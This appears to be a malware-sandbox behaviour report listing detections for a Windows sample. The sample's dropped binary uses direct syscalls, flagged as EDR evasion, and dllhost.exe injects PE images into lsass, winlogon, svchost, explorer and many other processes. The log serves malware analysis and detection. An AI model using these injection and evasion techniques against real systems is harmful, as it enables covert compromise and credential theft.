Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C22F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB972EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E91B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 31C92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD1B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D43C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C6DC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 29E72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 43A62EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB372EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 31822EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E3642EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8EA12EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2EBE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 96452EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A0382EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9F392EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EF032EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\cmd.exe EIP: D2922EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\conhost.exe EIP: EE52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B8A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3BA02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EDA52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B5252EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B5252EBC
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtCreateThreadEx: Direct from: 0x401A17 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtWriteVirtualMemory: Direct from: 0x401D57 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtProtectVirtualMemory: Direct from: 0x401DD7 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtClose: Direct from: 0x401CD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtAllocateVirtualMemory: Direct from: 0x401D97 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1FC5FF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1FC60380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 161C7340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 233B91B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 210918F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2062E960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 282B8D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22856DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18F9CCD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207BAC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16F9C9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27A01800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2992B230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23227590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BC9BDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28098F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23ACD780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BBD2B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F1C1330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192A4090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F8F61C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5112C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2848B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A12F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D8115C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C8B4690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BF9EBD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 213C6680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25B905C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2905A8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BADC5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A5FA180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19296180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24ED0B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20955300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 27D95820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B054660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15D00D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20983090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FBDB1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 278CACC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DF6DEC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13AD1CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DAE2270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1FD1BED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 284FF340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22687920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17CCCCC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B661F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 281EEB30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DD637D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 29E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2081CC80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EFC6EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23263180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2064B670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 2609B3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 22E30FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A0E5E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1F535400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 238916A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A2C40A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 1BA8FD80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\SystemSettingsuserer.exe base: 157081D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 255E3AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 149A8F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23115780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21C5D0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 1B97E3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2A3693C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 29204CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2A0126F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 251F17A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 11B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1C0000 value starts with: 4D5A
